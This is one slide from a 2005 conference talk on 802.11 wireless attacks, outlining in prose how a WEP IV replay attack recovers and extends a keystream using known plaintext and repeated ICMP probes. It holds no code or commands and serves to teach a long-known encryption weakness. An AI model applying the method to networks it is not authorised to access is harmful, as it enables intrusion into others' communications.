802.11 Wireless Attacks  Home ToC Prev Up Next 
802.11
Attacks
O/S/M Vulnerabilities
WEP Encryption
Passive Attacks
Active Attacks
+IV Reply Attack
Bit-flipping Attack
ManInTheMiddle
MITM Attack
Cisco LEAP
LEAP weaknesses
LEAP attack
ICV issue
Passive WPA PSK
WPA PSK attacks
PSK attack tools
Conclusion
  

IV Reply Attack

  1. A known plain-text message is sent to an wireless client (an email message, ICMP request, ..)

  2. The attacker will sniff the wireless looking for the predicted cipher-text

  3. The attacker will find the known frame and compute the key stream

  4. The attacker can grow the key stream to any size required

    • The attacker builds a frame one byte larger than the known key stream size (ICMP frame should be ideal for obtaining the response)

    • The attacker augments the key stream by one byte - he tries all possible values (i.e. he sends 256 ICMP requests)

    • When the attacker guesses the correct value, the expected response (e.g. the ICMP reply message) is received

    • The attacker can repeat this process until the desired key stream length is obtained
Copyright © 2005 Pavol Lupták, OpenWeekend 2005  Prev Next